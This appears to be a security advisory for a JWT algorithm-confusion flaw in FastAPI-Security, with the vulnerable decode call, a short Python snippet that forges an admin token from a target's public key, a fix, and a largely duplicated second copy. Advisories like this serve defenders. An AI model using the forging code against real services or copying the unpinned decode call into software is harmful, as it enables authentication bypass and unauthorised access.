CVE-2026-5580

JWT Algorithm Confusion in FastAPI-Security

FastAPI-Security v0.5.0–0.6.3

A vulnerability in JWT validation logic allows attackers to bypass signature verification by switching algorithm from RS256 to HS256.

Vulnerability Summary

CVE: CVE-2026-5580 CVSS: 7.5 (High) CWE: CWE-327 (Use of Broken or Risky Cryptographic Algorithm)

FastAPI-Security versions 0.5.0 through 0.6.3 use the python-jose library for JWT validation without specifying a fixed algorithm. The library defaults to trusting the algorithm specified in the JWT header, enabling algorithm confusion attacks.

Technical Details

Root Cause

The vulnerable code in fastapi_security/jwt.py:

# VULNERABLE: algorithm not specified — trusts the token's header
payload = jose.jwt.decode(token, public_key)

Because algorithms is not specified, python-jose uses whatever alg is in the token header. An attacker who knows the RS256 public key (commonly served at /.well-known/jwks.json) can:

Create a new JWT with "alg": "HS256" in the header
Sign it using the RS256 public key as the HMAC-SHA256 secret
The server decodes using HS256 with the public key → signature matches → authentication succeeds

Exploitation

import jwt
import requests

# Step 1: Get the public key
jwks = requests.get("[https://api.target.com/.well-known/jwks.json](https://api.target.com/.well-known/jwks.json)").json()
public_key = extract_pem(jwks["keys"][0])

# Step 2: Forge token with HS256 + public key as secret
forged = jwt.encode(
    {"sub": "admin", "role": "administrator"},
    public_key,
    algorithm="HS256"
)

Impact

Any authenticated endpoint in a FastAPI application using fastapi-security 0.5.0–0.6.3 can be accessed by an unauthenticated attacker who can obtain or guess the application's public key.

Remediation

Update to FastAPI-Security 0.7.0 or later. If patching is not immediately possible:

# SAFE: explicitly specify algorithm
payload = jose.jwt.decode(token, public_key, algorithms=["RS256"])

jwtalgorithm-confusionfastapihighpython

Related Intelligence

Further exploration based on cross-referenced content.

blog

JWT Attacks: A Complete Practitioner''s Guide

From alg:none bypasses to RS256→HS256 confusion attacks — every JWT vulnerability explained with working payloads.

April 17, 2026

tools

Auth Bypass Kit

Collection of authentication bypass techniques packaged as a CLI — JWT attacks, OAuth flaws, SAML misconfigurations, and session fixation .

April 17, 2026

research

SSRF via Misconfigured OAuth Callback

A Server-Side Request Forgery vulnerability in the OAuth callback handler allows attackers to redirect callbacks to internal network endpoints.

February 28, 2026

Vulnerability Summary

CVE: CVE-2026-5580 CVSS: 7.5 (High) CWE: CWE-327 (Use of Broken or Risky Cryptographic Algorithm)

Technical Details

Root Cause

The vulnerable code in fastapi_security/jwt.py:

# VULNERABLE: algorithm not specified — trusts the token's header payload = jose.jwt.decode(token, public_key)

Because algorithms is not specified, python-jose uses whatever alg is in the token header. An attacker who knows the RS256 public key (commonly served at /.well-known/jwks.json) can:

Create a new JWT with "alg": "HS256" in the header

Sign it using the RS256 public key as the HMAC-SHA256 secret

The server decodes using HS256 with the public key → signature matches → authentication succeeds

Exploitation

import jwt import requests # Step 1: Get the public key jwks = requests.get("[https://api.target.com/.well-known/jwks.json](https://api.target.com/.well-known/jwks.json)").json() public_key = extract_pem(jwks["keys"][0]) # Step 2: Forge token with HS256 + public key as secret forged = jwt.encode( {"sub": "admin", "role": "administrator"}, public_key, algorithm="HS256" )